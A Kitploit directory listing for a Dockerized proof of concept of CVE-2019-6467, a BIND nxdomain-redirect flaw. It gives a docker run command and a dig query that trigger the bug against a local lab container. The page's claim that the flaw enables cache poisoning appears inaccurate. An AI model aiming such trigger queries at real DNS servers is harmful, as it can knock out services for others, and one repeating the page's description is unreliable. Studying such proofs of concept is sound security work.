Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/knqyf263/cve-2019-6467
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationDNS Analysis
GitHubknqyf263/cve-2019-6467

CVE-2019-6467

Dockerized proof-of-concept exploit for CVE-2019-6467, a BIND nxdomain-redirect vulnerability, enabling DNS cache poisoning via non-existent domain queries.

View Repository
26727 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-6467

BIND nxdomain-redirect

For educational purposes only

demo

Run

root@kitploit:~
$ docker run --rm --name cve-2019-6467 -it -p 53:53/udp knqyf263/cve-2019-6467

Exploit

Normal query

root@kitploit:~
$ dig @127.0.0.1 nxdomain.example.com

nxdomain can be replaced by anything that means non-existent domain name. (e.g. foobar.example.com)

Reference

  • https://ftp.isc.org/isc/bind/9.12.4-P1/RELEASE-NOTES-bind-9.12.4-P1.html
  • https://ftp.isc.org/isc/bind9/9.14.1/RELEASE-NOTES-bind-9.14.1.html
Download Tool